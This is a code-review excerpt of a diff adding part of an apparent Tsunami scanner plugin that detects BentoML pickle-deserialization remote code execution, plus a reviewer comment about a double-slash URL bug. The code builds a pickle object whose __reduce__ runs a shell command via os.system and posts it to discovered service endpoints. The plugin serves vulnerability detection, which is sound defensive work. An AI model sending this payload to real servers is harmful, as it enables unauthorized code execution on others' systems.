py_plugins/bentoml_deserialization_rce/bentoml_rce_detector.py

```diff
@@ -0,0 +1,206 @@
+        try:
+            response = self.http_client.send(request, network_service)
+            for pathName in response.body_json()["paths"]:
+                print(pathName)
+                for httpMethod in response.body_json()["paths"][pathName]:
+                    for tags in response.body_json()["paths"][pathName][httpMethod]["tags"]:
+                        print(tags)
+                        if tags == "Service APIs":
+                            paths_and_methods.append([pathName, httpMethod])
+        except Exception:  # pylint: disable=broad-exception-caught
+            logging.exception('Unable to query %s', url)
+
+        if len(paths_and_methods) == 0:
+            # there are no Service APIs to exploit
+            return False
+
+        config = pg.PayloadGeneratorConfig(
+            vulnerability_type=pg.PayloadGeneratorConfig.VulnerabilityType.REFLECTIVE_RCE,
+            interpretation_environment=pg.PayloadGeneratorConfig.InterpretationEnvironment.LINUX_SHELL,
+            execution_environment=pg.PayloadGeneratorConfig.ExecutionEnvironment.EXEC_INTERPRETATION_ENVIRONMENT,
+        )
+        payload = self.payload_generator.generate(config)
+        if not payload.get_payload_attributes().uses_callback_server:
+            return False
+
+        class Payload(object):
+            def __reduce__(self):
+                import os
+                return os.system, (f'/bin/sh -c "{payload.get_payload()}"',)
+
+        rce_command = pickle.dumps(Payload())
+        for path_and_method in paths_and_methods:
+            url = self._BuildUrl(network_service, path_and_method[0])
+            request = (
+                HttpRequest.builder().set_method(path_and_method[1].upper()).set_url(url)
+                .set_headers(
+                    HttpHeaders.builder()
+                    .add_header("Content-Type", "application/vnd.bentoml+pickle")
+                    .build()
+                )
+                .set_request_body(rce_command)
+                .build()
+            )
+            try:
+                response = self.http_client.send(request, network_service)
+                time.sleep(_SLEEP_TIME_SEC)
+                return payload.check_if_executed(response.body)
+            except Exception:  # pylint: disable=broad-exception-caught
+                logging.exception('Unable to query %s', url)
+        return False
+
+    def _BuildUrl(self, network_service: tsunami_plugin.NetworkService, vulnerable_path) -> str:
+        """Build the vulnerable target path for RCE injection."""
+        if network_service_utils.is_web_service(network_service):
+            url = network_service_utils.build_web_application_root_url(
+                network_service
+            )
+        else:
+            url = 'http://{}/'.format(
+                network_endpoint_utils.to_uri_authority(
+                    network_service.network_endpoint
+                )
+            )
+        return url + vulnerable_path
```

Comment:
I've found that the exploit fails when the output of this function contains a double-slash `//` between hostname and path (e.g. `http://target//path`), so, before returning the final URL, make sure to strip extra `/` from the path.